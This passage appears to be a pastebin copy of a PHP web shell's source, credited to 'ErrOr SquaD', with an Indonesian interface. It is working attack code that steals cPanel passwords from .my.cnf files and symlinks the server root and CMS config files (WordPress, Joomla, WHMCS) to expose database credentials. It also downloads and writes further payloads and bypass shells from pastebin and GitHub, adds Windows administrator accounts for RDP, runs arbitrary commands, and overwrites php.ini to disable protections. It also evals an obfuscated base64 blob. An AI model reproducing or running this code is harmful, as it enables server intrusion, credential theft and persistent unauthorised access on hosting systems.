</th></tr>"; $count=1; $dc = 0; $mck = array(); foreach($d0mains as $d0main){ if(@eregi('zone',$d0main)){ preg_match_all('#zone "(.*)"#',$d0main,$domain); flush(); if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0]; } } } $mck = array_unique($mck); $usr = array(); $dmn = array(); foreach($mck as $o) { $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o)); $usr[] = $infos['name']; $dmn[] = $o; } array_multisort($usr,$dmn); $dt = file('/etc/passwd'); $passwd = array(); foreach($dt as $d) { $r = explode(':',$d); if(strpos($r[5],'home')) { $passwd[$r[0]] = $r[5]; } } $l=0; $j=1; foreach($usr as $r) { $dirz = '/home/'.$r.'/.my.cnf'; $path = getcwd(); if (is_readable($dirz)) { copy($dirz, ''.$path.'/'.$r.'.txt'); $p=file_get_contents(''.$path.'/'.$r.'.txt'); $password=entre2v2($p,'password="','"'); echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>"; $dc++; flush(); $l=$l?0:1; $j++; } } } echo '</table>'; $total = $dc; echo '<br><h3>Total cPanel Found = '.$total.'</h3><br />'; echo '</center>'; } }else{ echo "<h3><i><font color='red'>ERROR</font><br><font color='red'>/var/named</font> or <font color='red'>etc/named.conf</font> Not Accessible!</i></h3>"; } echo "</body></html>"; die(); } elseif(isset($_GET['x']) && ($_GET['x'] == 'vn')) { ?>
  522.                     <form action="?path=<?php echo $path; ?>&amp;x=vn" method="post">
  523.                     <center><h2>Domain Viewer</h2></center><br><br>
  524.                     <?php  function openBaseDir() { $openBaseDir = ini_get("open_basedir"); if (!$openBaseDir) { $openBaseDir = '<font color="green">OFF</font>'; } else { $openBaseDir = '<font color="red">ON</font>'; } return $openBaseDir; } echo '
  525.                     <table width="95%" cellspacing="0" cellpadding="0"  >
  526.                     <td height="100" align="left" >'; $pg = basename(__FILE__); $safe_mode = @ini_get('safe_mode'); $dir = @getcwd(); @mkdir('pee',0777); @symlink("/","pee/root"); $htaccss = "Options all
  527.                  DirectoryIndex Sux.html
  528.                  AddType text/plain .php
  529.                  AddHandler server-parsed .php
  530.                   AddType text/plain .html
  531.                  AddHandler txt .html
  532.                  Require None
  533.                  Satisfy Any"; file_put_contents("pee/.htaccess",$htaccss); $etc = file_get_contents("/etc/passwd"); $etcz = explode("\n",$etc); foreach($etcz as $etz){ $etcc = explode(":",$etz); error_reporting(0); $current_dir = posix_getcwd(); $dir = explode("/",$current_dir); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php',"pee/".$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php',"pee/".$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php',"pee/".$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php',"pee/".$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php',"pee/".$etcc[0].'-PhpBB.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php',"pee/".$etcc[0].'-vBulletin.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php',"pee/".$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php',"pee/".$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php',"pee/".$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php',"pee/".$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php',"pee/".$etcc[0].'-IPB.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php',"pee/".$etcc[0].'-MyBB.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php',"pee/".$etcc[0].'-SMF.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php',"pee/".$etcc[0].'-Drupal.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php',"pee/".$etcc[0].'-e107.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php',"pee/".$etcc[0].'-Seditio.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php',"pee/".$etcc[0].'-osCommerce.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); } if(is_readable("/var/named")){ echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >'; echo'<tr><td><center><b>SITE</b></center></td><td>
  534.                     <center><b>USER</b></center></td>
  535.                     <td></center><b>SYMLINK</b></center></td>'; $list = scandir("/var/named"); foreach($list as $domain){ if(strpos($domain,".db")){ $i += 1; $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
  536.                     <td class='td1'><center><font color='red'>".$owner['name']."</font></center></td>
  537.                     <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>"; } } echo "<center>Total Domains Found: ".$i."</center><br />"; }else{ echo "<tr><td class='td1'>can't read [ /var/named ]</td><tr>"; } die(); error_reporting(0); $etc = file_get_contents("/etc/passwd"); $etcz = explode("\n",$etc); if(is_readable("/etc/passwd")){ echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >'; echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>SYMLINK</b></center></td>'; $list = scandir("/var/named"); foreach($etcz as $etz){ $etcc = explode(":",$etz); foreach($list as $domain){ if(strpos($domain,".db")){ $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); if($owner['name'] == $etcc[0]) { $i += 1; echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center>
  538.                 <td class='td1'><font color='red'>".$owner['name']."</font></center></td>
  539.                 <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>"; }}}} echo "<center>Total Domains Found: ".$i."</center><br />";} die(); if(is_readable("/etc/named.conf")){ echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >'; echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>'; $named = file_get_contents("/etc/named.conf"); preg_match_all('%zone \"(.*)\" {%',$named,$domains); foreach($domains[1] as $domain){ $domain = trim($domain); $i += 1; $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='red'>".$owner['name']."</font></center></td><td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>"; } echo "<center>Total Domains Found: ".$i."</center><br />"; } else { echo "<tr><td class='td1'>can't read [ /etc/named.conf ]</td></tr>"; } die(); if(is_readable("/etc/valiases")){ echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >'; echo'<tr><td><center><b>SITE</b></center></td><td>
  540.                 <center><b>USER</b></center></td><td></center>
  541.                 <b>SYMLINK</b></center></td>'; $list = scandir("/etc/valiases"); foreach($list as $domain){ $i += 1; $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
  542.                 <center><td class='td1'><font color='red'>".$owner['name']."</font></center></td>
  543.                 <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>"; } echo "<center>Total Domains Found: ".$i."</center><br />"; } else { echo "<tr><td class='td1'>can't read [ /etc/valiases ]</td></tr>"; } die(); } elseif(isset($_GET['x']) && ($_GET['x'] == 'dump')) { ?>
  544.                 <br/><br/>
  545.                 <form action="?path=<?php echo $path; ?>&amp;x=dump" method="post">
  546.                 <?php  $pilih = $_POST['pilihan']; echo'<center>
  547.                 <table border=1>
  548.                 <select class="bordergaya" align="left"  name="pilihan" id="pilih">
  549.                 <option value="dumper">Gate 1</option>
  550.                 </select>
  551.                 <input  type="submit" name="submites" class="bordergaya" value="Click here for Dump Email">';?><?php  if ( $pilih == "dumper") { $files = file_get_contents("http://pastebin.com/raw/HhiURUER"); file_put_contents("dumper.php",$files); echo "<script>alert('Done! Access dumper.php for processing'); hideAll();</script>"; echo "<a href=".'dumper.php'." target=_blank><br/><br/><b>dumper.php [Click here]</b></a></center>"; die(); } echo'</td></form></tr></table>'; die(); } if(isset($_GET['x']) && ($_GET['x'] == 'krdp')) { if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { ?><br/><br/>
  552.                         <div id="content-left">
  553.                                 <form action="" method="post">
  554.                                 <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
  555.                                     <tr>
  556.                                         <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">CREATE RDP</font></td>
  557.                                     </tr>
  558.                                     <tr>
  559.                                         <td><font class='kecew'>Username</font></td>
  560.                                         <td><font class='kecew'> : </font></td>
  561.                                         <td><input type="text" class="bordergaya" name="username" required></td>
  562.                                     </tr>
  563.                                     <tr>
  564.                                         <td><font class='kecew'>Password</font></td>
  565.                                         <td><font class='kecew'> : </font></td>
  566.                                         <td><input type="text" class="bordergaya" name="password" required></td>
  567.                                     </tr>
  568.                                     <tr>
  569.                                         <td colspan="3" align="center"><input type="hidden" name="kshell" value="1"><input type="submit" name="submit" class="bordergaya" value="Create"></td>
  570.                                     </tr>
  571.                                 </table>
  572.                                 </form>
  573.                                 </div>
  574.                                 <br/>
  575.                                 <div id="content-left">
  576.                                 <form action="" method="post">
  577.                                     <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
  578.                                         <tr>
  579.                                             <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">OPTION</td>
  580.                                         </tr>
  581.                                         <tr>
  582.                                             <td><font class='kecew'>Username</font></td>
  583.                                             <td><font class='kecew'> : </font></td>
  584.                                             <td><input type="text" name="rusername" placeholder="Input Username" class="bordergaya"></td>
  585.                                         </tr>
  586.                                         <tr>
  587.                                             <td><font class='kecew'>Password</font></td>
  588.                                             <td><font class='kecew'> : </font></td>
  589.                                             <td><input type="text" name="gantipw" placeholder="Password new" class="bordergaya"></td>
  590.                                         </tr>
  591.                                         <tr>
  592.                                             <td><font class='kecew'>Action</font></td>
  593.                                             <td><font class='kecew'> : </font></td>
  594.                                             <td>
  595.                                                 <select name="aksi" class="bordergaya">
  596.                                                         <option value="1">Show Username</option>
  597.                                                         <option value="2">Delet Username</option>
  598.                                                         <option value="3">Change Password</option>
  599.                                                 </select>
  600.                                             </td>
  601.                                         </tr>
  602.                                         <tr>
  603.                                             <td colspan="3" align="center"><input type="hidden" name="kshell" value="2"><input type="submit" name="submit" class="bordergaya" value="Execute"></td>
  604.                                         </tr>
  605.                                     </table>
  606.                                 </form>
  607.                                 <br/>
  608.                         </div>
  609.                         </center></center>
  610.                     <?php  if($_POST['submit']) { if($_POST['kshell']=="1") { $r_user = $_POST['username']; $r_pass = $_POST['password']; $cmd_cek_user = shell_exec("net user"); if(preg_match("/$r_user/", $cmd_cek_user)){ echo $gaya_root.$r_user." sudah ada".$o; }else { $cmd_add_user = shell_exec("net user ".$r_user." ".$r_pass." /add"); $cmd_add_groups1 = shell_exec("net localgroup Administrators ".$r_user." /add"); $cmd_add_groups2 = shell_exec("net localgroup Administrator ".$r_user." /add"); $cmd_add_groups3 = shell_exec("net localgroup Administrateur ".$r_user." /add"); if($cmd_add_user){ echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='greenyellow'>Berhasil!</font></font><br/><br/>".$o; }else { echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='red'>fail!</font><br/><br/>".$o; } echo "<font class='rapihbanget'>[+] Sedang Memroses User.. Silahkan Tunggu Sebentar..  <br/>"; if($cmd_add_groups1){ echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o; }else if($cmd_add_groups2){ echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o; }else if($cmd_add_groups3){ echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o; }else { echo $gaya_root."<font class='rapihbanget'>--- Maaf User ".$r_user." <font color='red'>fail Di Proses!</font><br/><br/>".$o; } echo "<font class='rapihbanget'>[+] Server Info : </font><br/>"; echo $gaya_root."<font class='rapihbanget'>--- ServerIP : ".$_SERVER["HTTP_HOST"]."</font><br/><font class='rapihbanget'>--- Username  : ".$r_user."</font><br/><font class='rapihbanget'>--- Password  : </font>".$r_pass.$o."</font><br/><br/>"; echo "<font class='rapihbanget'>[+] Thank For Using It ~_^ </font><br/><br/>"; } } else if($_POST['kshell']=="2") { echo "<style>
  611.                                     .coeg{margin-left:30%;}
  612.                                     </style>"; if($_POST['aksi']=="1"){ echo "<pre class='coeg'>".shell_exec("net user"); } else if($_POST['aksi']=="2") { $username = $_POST['rusername']; $cmd_cek_user = shell_exec("net user"); if (!empty($username)){ if(preg_match("/$username/", $cmd_cek_user)){ $cmd_add_user = shell_exec("net user ".$username." /DELETE"); if($cmd_add_user){ echo "<font class='rapihbanget'>[+] Sedang Memroses.. Silahkan Tunggu..  </font><br /><br />"; echo $gaya_root."<font class='rapihbanget'>[+] Selamat! Remove User  </font><font color='orange'>".$username." </font><font color='greenyellow'>Berhasil!!</font><br /><br />".$o; }else { echo $gaya_root."<font class='rapihbanget'>[+] Yah :( Remove User  </font><font color='orange'>".$username." </font><font color='red'>fail!!</font><br /><br />".$o; } }else { echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> Itu Enggak Ada!!</font><br /><br />".$o; } }else { echo $gaya_root."<font class='rapihbanget'> Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!! </font><br /><br />".$o; } } else if($_POST['aksi']=="3") { echo "<style>
  613.                                         .tengahaja{margin-left:35%}
  614.                                       </style>"; $username = $_POST['rusername']; $password = $_POST['gantipw']; $cmd_cek_user = shell_exec("net user"); if (!empty($username)){ if(preg_match("/$username/", $cmd_cek_user)){ $cmd_add_user = shell_exec("net user ".$username.""); if($cmd_add_user){ echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='greenyellow'>Berhasil!!</font><br /><br />".$o; }else { echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='red'>fail!!</font><br /><br />".$o; } }else { echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> Itu Enggak Ada!!</font><br /><br />".$o; } }else { echo $gaya_root."<font class='rapihbanget'> Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!! </font><br /><br />".$o; } } } } } else{ echo "<br><br><font color='springgreen' face='Fredericka The Great'>TOOLS GAK BISA DI PAKE NDAN -_- SERVERNYA BUKAN WINDOWS</font>"; }die(); } elseif(isset($_GET['x']) && ($_GET['x'] == 'fcrot')) { echo'<center><br><br><h3>File Creator [Auto upload]</h3>
  615.                 <table>
  616.                 <tr><form method="post" action="">&nbsp;<td>
  617.                 <select class="bordergaya" align="left"  name="pilihan" id="pilih">
  618.                 <option value="hsphere">Bypass hSphere Shell</option>
  619.                 <option value="adminer">Adminer</option>
  620.                 </select>
  621.                 <input  type="submit" name="submites" class="bordergaya" value="create">
  622.                 </td></form></tr></table><br/><br/><br/>'; error_reporting(0); set_time_limit(0); $submit = $_POST ['submites']; if(isset($submit)) { $pilih = $_POST['pilihan']; if ( $pilih == 'hsphere') { $files = file_get_contents("https://raw.githubusercontent.com/sinkaroid/pasirmerah/sc0/sc0hsphere.php"); file_put_contents("hsphere.php",$files); echo "<script>alert('Bypass hsphere shell created!'); hideAll();</script>"; echo "<a href="."hsphere.php"." target=_blank><b>hsphere.php [Click here]</b></a></center>"; die(); } elseif ( $pilih == 'adminer') { getfile("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php"); echo "<script>alert('adminer created!'); hideAll();</script>"; echo "<a href="."adminer.php"." target=_blank><b>adminer.php [Click here]</b></a></center>"; die(); } }die(); } elseif(isset($_GET['x']) && ($_GET['x'] == 'korong')) { echo '<center><br /><br />
  623.                         <form enctype="multipart/form-data" method="POST">
  624.                             <input type="file" name="file" id="file" class="inputfile inputfile-4" />
  625.                             <label for="file">
  626.                                 <figure>
  627.                                     <svg xmlns="http://www.w3.org/2000/svg" width="20" height="17" viewBox="0 0 20 17"><path d="M10 0l-5.2 4.9h3.3v5.1h3.8v-5.1h3.3l-5.2-4.9zm9.3 11.5l-3.2-2.1h-2l3.4 2.6h-3.5c-.1 0-.2.1-.2.1l-.8 2.3h-6l-.8-2.2c-.1-.1-.1-.2-.2-.2h-3.6l3.4-2.6h-2l-3.2 2.1c-.4.3-.7 1-.6 1.5l.6 3.1c.1.5.7.9 1.2.9h16.3c.6 0 1.1-.4 1.3-.9l.6-3.1c.1-.5-.2-1.2-.7-1.5z"/></svg>
  628.                                 </figure>
  629.                                 <span>Please Select File</span>
  630.                             </label>'; ?>
  631.                             <script type="text/javascript">
  632.                                     /*
  633.                                         By Osvaldas Valutis, www.osvaldas.info
  634.                                         Available for use under the MIT License
  635.                                     */
  636.  
  637.                                     'use strict';
  638.  
  639.                                     ;( function ( document, window, index )
  640.                                     {
  641.                                         var inputs = document.querySelectorAll( '.inputfile' );
  642.                                         Array.prototype.forEach.call( inputs, function( input )
  643.                                         {
  644.                                             var label    = input.nextElementSibling,
  645.                                                 labelVal = label.innerHTML;
  646.  
  647.                                             input.addEventListener( 'change', function( e )
  648.                                             {
  649.                                                 var fileName = '';
  650.                                                 if( this.files && this.files.length > 1 )
  651.                                                     fileName = ( this.getAttribute( 'data-multiple-caption' ) || '' ).replace( '{count}', this.files.length );
  652.                                                 else
  653.                                                     fileName = e.target.value.split( '\\' ).pop();
  654.  
  655.                                                 if( fileName )
  656.                                                     label.querySelector( 'span' ).innerHTML = fileName;
  657.                                                 else
  658.                                                     label.innerHTML = labelVal;
  659.                                             });
  660.  
  661.                                             // Firefox bug fix
  662.                                             input.addEventListener( 'focus', function(){ input.classList.add( 'has-focus' ); });
  663.                                             input.addEventListener( 'blur', function(){ input.classList.remove( 'has-focus' ); });
  664.                                         });
  665.                                     }( document, window, 0 ));
  666.                             </script>
  667.                             <?php  echo'<br/>
  668.                             <input type="submit" class="tombolupil" value="Upload File!" />
  669.                         </form>'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '<script>alert("File done  Di Upload!");</script>'; }else{ echo '<script>alert("File fail Di Upload!");</script>'; } } echo "</center><br /><br />"; die(); } elseif(isset($_GET['x']) && ($_GET['x'] == 'cmd')) { echo "<br/><br/><form method='post'>
  670.                 <font clss='rapihbanget'>Command :</font>
  671.                 <input class='bordergaya' type='text' size='30' height='10' name='cmd'><input type='submit' class='bordergaya' name='execmd' value=' Execute '>
  672.                 </form>"; if($_POST['execmd']) { echo "<pre>".exe($_POST['cmd'])."</pre>"; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'bypstuls')) { echo "<br/><br/> Choose Tools Boss ^_^<br/><br/>"; ?>
  673.                     <a href="?<?php echo "path=".$path; ?>&amp;x=bysysfuncwsf"><input class=bordergaya type=submit value="Bypass Root Path With System Function" /></a>
  674.                     Or <a href="?<?php echo "path=".$path; ?>&amp;x=bypsini"><input class=bordergaya type=submit value="Bypass Disable Functions" /></a>
  675.                     Or <a href="?<?php echo "path=".$path; ?>&amp;x=bysysfuncwexec"><input class=bordergaya type=submit value="Bypass Root Path With Exec Function" /></a>
  676.                     <br/><br/><br/><br/>
  677.                     <?php  } elseif(isset($_GET['x']) && ($_GET['x'] == 'bysysfuncwsf')) { echo '<br><center><span style="font-size:20px; font-family:Fredericka the Great; color:orange">Bypass Root Path With System Function</span><center>'; mkdir('bysyswsf', 0755); chdir('bysyswsf'); $bysyswsf = file_get_contents("http://pastebin.com/raw/nUTTPQnm"); $file = fopen("bysyswsf.php" ,"w+"); $write = fwrite ($file ,$bysyswsf); fclose($file); chmod("bysyswsf.php",0755); echo "<iframe src=bysyswsf/bysyswsf.php width=70% height=70% frameborder=0></iframe>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'bypsini')) { $byht = "safe_mode = Off
  678.                     disable_functions = None
  679.                     safe_mode_gid = OFF
  680.                     open_basedir = OFF
  681.                     allow_url_fopen = On"; file_put_contents("php.ini",$byht); echo "<script>alert('Congrats! done  Bos Q ~_^'); hideAll();</script>"; die('<meta http-equiv="refresh" content="0; url=?" />'); } elseif(isset($_GET['x']) && ($_GET['x'] == 'bysysfuncwexec')) { echo '<br><center><span style="font-size:20px; font-family:Fredericka the Great; color:orange">Bypass Root Path With Exec Function</span><center>'; mkdir('bysyswexecf', 0755); chdir('bysyswexecf'); $bysyswsf = file_get_contents("http://pastebin.com/raw/KJiLdADd"); $file = fopen("bysyswexecf.php" ,"w+"); $write = fwrite ($file ,$bysyswsf); fclose($file); chmod("bysyswexecf.php",0755); echo "<iframe src=bysyswexecf/bysyswexecf.php width=70% height=70% frameborder=0></iframe>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping')){ ?>
  682.                 <form action="?path=<?php echo $pwd; ?>&amp;x=jumping" method="post">
  683.                 <?php  ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>'); set_time_limit(0); @$passwd = fopen('/etc/passwd','r'); if (!$passwd) { die('<br>[-] Error : coudn`t read /etc/passwd'); } $pub = array(); $users = array(); $conf = array(); $i = 0; while(!feof($passwd)) { $str = fgets($passwd); if ($i > 35) { $pos = strpos($str,':'); $username = substr($str,0,$pos); $dirz = '/home/'.$username.'/public_html/'; if (($username != '')) { if (is_readable($dirz)) { array_push($users,$username); array_push($pub,$dirz); } } } $i++; } echo '<br><br></center></center>'; echo "<font class='rapihbanget'>[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br /></font>"; echo "<font class='rapihbanget'>[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br /></font>"; echo "<font class='rapihbanget'>[~] Searching for passwords in config files...<br /><br /></font>"; foreach ($users as $user) { $path = "/home/$user/public_html/"; echo "<font class='rapihbanget'><a href='?path&#61;$path' target='_blank' font-weight:bold; color:#F80;'>$path</a><br></font>"; } echo "<br /><font class='rapihbanget'>[+] Complete...\n"."<br /></font>"; echo "<font class='rapihbanget'>[+] Monggo Sikat Boz!\n"."<br /></font>"; echo '<br><br></b></body><center>'; } elseif(isset($_GET['x']) && ($_GET['x'] == 'zonesH')){ echo "<br/><br/>";@eval(gzinflate(base64_decode($zoneH))); "</div>"; } else{ echo '<table><br />'; echo "<center>"; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '<script>alert("Delete Dir done !");</script>'; }else{ echo '<script>alert("Delete Dir fail!");</script>'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo '<script>alert("Delete File done !");</script>'; }else{ echo '<script>alert("Delete File fail!");</script>'; } } } echo '</center>'; $scandir = scandir($path); echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  684.             '; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "<tr>
  685.             <td><a style='color:white; font-family:Homenaje;' href=\"?path=$path/$dir\">$dir</a></td>
  686.             <td><center style='color:orange; font-family:Homenaje;'>--</center></td>
  687.             <td><center>"; if(is_writable("$path/$dir")) echo "<font style='color:springgreen; font-family:Homenaje;'>"; elseif(!is_readable("$path/$dir")) echo "<font style='color:red; font-family:Homenaje;'>"; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>'; echo "</center></td>
  688.             <td width='26%'><center><form method=\"POST\" action=\"?option&path=$path\">
  689.             <select class='bordergaya' name=\"opt\">
  690.             <option value=\"\"></option>
  691.             <option value=\"delete\">Delete</option>
  692.             <option value=\"chmod\">Chmod</option>
  693.             <option value=\"rename\">Rename</option>
  694.             </select>
  695.             <input type=\"hidden\" name=\"type\" value=\"dir\">
  696.             <input type=\"hidden\" name=\"name\" value=\"$dir\">
  697.             <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
  698.             <input class='bordergaya' type=\"submit\" value=\"Execute\" />
  699.             </form></center></td>
  700.             </tr>"; } echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>'; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo "<tr>
  701.             <td><a style='color:white; font-family:Homenaje;' href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
  702.             <td><center  style='color:orange; font-family:Homenaje;'>".$size."</center></td>
  703.             <td><center>"; if(is_writable("$path/$file")) echo "<font style='color:springgreen; font-family:Homenaje;'>"; elseif(!is_readable("$path/$file")) echo "<font style='color:red; font-family:Homenaje;'>"; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>'; echo "</center></td>
  704.             <td width='26%'><center><form method=\"POST\" action=\"?option&path=$path\">
  705.             <select class='bordergaya' name=\"opt\">
  706.             <option value=\"\"></option>
  707.             <option value=\"delete\">Delete</option>
  708.             <option value=\"chmod\">Chmod</option>
  709.             <option value=\"rename\">Rename</option>
  710.             <option value=\"edit\">Edit</option>
  711.             </select>
  712.             <input type=\"hidden\" name=\"type\" value=\"file\">
  713.             <input type=\"hidden\" name=\"name\" value=\"$file\">
  714.             <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
  715.             <input class='bordergaya' type=\"submit\" value=\"Execute\" />
  716.             </form></center></td>
  717.             </tr>"; } echo '</table>
  718.             </div>'; } ?>
  719. <br/><br/>
  720. <div id="bawah">
  721. <script language="JavaScript">
  722.     Year=new Date();
  723.     var copyright=Year.getUTCFullYear(); document.write("<tabel style='padding:3px 6px; border:2px solid #2d2b2b; border-radius:5px;'><tr><td><font face='Fredericka the Great' size='3px' color='gray'> &hearts; ErrOr SquaD " + copyright +" &hearts;</font></td></tr></table>"); </script>
  724. </div>
  725. </BODY></html>
Add Comment
Please, Sign In to add comment